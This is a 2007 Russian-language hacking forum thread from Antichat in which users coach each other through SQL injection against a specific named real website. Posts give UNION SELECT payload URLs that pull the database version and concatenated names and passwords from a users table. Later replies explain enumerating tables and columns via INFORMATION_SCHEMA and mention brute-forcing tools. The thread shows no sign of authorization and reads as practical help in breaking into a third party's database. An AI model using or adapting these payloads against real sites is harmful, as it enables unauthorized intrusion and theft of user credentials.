HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

SQL-inj
  #1  
Старый 19.08.2007, 16:15
Qwertison
Познающий
Регистрация: 01.04.2007
Сообщений: 43
С нами: 10058475

Репутация: -5
Question SQL-inj

Вот SQL-inj
Код:
http://mir-tech.ru/select.php?cat=2&categ=2&l=0&cat_num=25&mess=-1
Можете мне обьяснить дураку, ато я никак не пойму как подбирать количество столбцов и их названия?
 
Ответить с цитированием

  #2  
Старый 19.08.2007, 16:46
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
С нами: 10263386

Репутация: 849
По умолчанию

А там нет скули. Поищи другие скрипты
 
Ответить с цитированием

  #3  
Старый 19.08.2007, 16:48
Qwertison
Познающий
Регистрация: 01.04.2007
Сообщений: 43
С нами: 10058475

Репутация: -5
По умолчанию

Всмысле, ошибка же есть?
 
Ответить с цитированием

  #4  
Старый 19.08.2007, 17:18
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
С нами: 10467686

Репутация: 930


По умолчанию

Там не смотрел, но вот тут она точно есть

Код:
хттп://mir-tech.ru/group.php?cat=-1+union+select+version()/*
Цитата:
хттп://mir-tech.ru/group.php?cat=-1+union+select+concat(name,0x3a,password)+from+mai n_users/*

Последний раз редактировалось Ksander; 20.08.2007 в 14:11..
 
Ответить с цитированием

  #5  
Старый 20.08.2007, 13:33
Qwertison
Познающий
Регистрация: 01.04.2007
Сообщений: 43
С нами: 10058475

Репутация: -5
По умолчанию

хттп://mir-tech.ru/group.php?cat=-1+union+select+concat(user,0x3a,password)+from+mai n_users/*-
Unknown column 'user' in 'field list'
Еще вопрос. А как ты узнаеш как называется табл. . Main_users, users или accaunts. Так и user, username, password, pass, passwd. Это нужно все комбинации по-очереди пробовать?
 
Ответить с цитированием

  #6  
Старый 20.08.2007, 13:46
phol1eadeux
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
С нами: 9874372

Репутация: 138
По умолчанию

Цитата:
Еще вопрос. А как ты узнаеш как называется табл. . Main_users, users или accaunts. Так и user, username, password, pass, passwd. Это нужно все комбинации по-очереди пробовать?
Можно вручную, либо специализированными программами-брутерами
 
Ответить с цитированием

  #7  
Старый 20.08.2007, 14:02
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
С нами: 10467686

Репутация: 930


По умолчанию

Цитата:
Сообщение от Qwertison  
хттп://mir-tech.ru/group.php?cat=-1+union+select+concat(user,0x3a,password)+from+mai n_users/*-
Unknown column 'user' in 'field list'
Еще вопрос. А как ты узнаеш как называется табл. . Main_users, users или accaunts. Так и user, username, password, pass, passwd. Это нужно все комбинации по-очереди пробовать?

Версия мускуля 5, а значит можно их просто посмотреть и выбрать то что нужно, так перебираются таблици:

Код:
union select TABLE_NAME from INFORMATION_SCHEMA.TABLES limit 0,1/*
А потом колонки в интересующей нас табле:

Код:
union select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='имя_таблици' limit 0,1/*

Последний раз редактировалось Ksander; 20.08.2007 в 14:33..
 
Ответить с цитированием

  #8  
Старый 20.08.2007, 14:24
ENFIX
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
С нами: 10488959

Репутация: 474
По умолчанию

Цитата:
Сообщение от Ksander  
Версия мускуля 5, а значит можно их просто посмотреть и выбрать то что нужно, так перебираются таблици:

Код:
union select TABLE_NAME from INFORMATION.SCHEMA_TABLES limit 0,1/*
А потом колонки в интересующей нас табле:

Код:
union select COLUMN_NAME from INFORMATION.SCHEMA_COLUMNS where TABLE_NAME='имя_таблици' limit 0,1/*
Все так, только
INFORMATION_SCHEMA.TABLES и INFORMATION_SCHEMA.COLUMNS
 
Ответить с цитированием

  #9  
Старый 20.08.2007, 14:34
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
С нами: 10467686

Репутация: 930


По умолчанию

Цитата:
Сообщение от ENFIX  
Все так, только
INFORMATION_SCHEMA.TABLES и INFORMATION_SCHEMA.COLUMNS
опечатался =)
 
Ответить с цитированием

  #10  
Старый 20.08.2007, 13:48
Qwertison
Познающий
Регистрация: 01.04.2007
Сообщений: 43
С нами: 10058475

Репутация: -5
По умолчанию

Какими например, я таких не видел.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...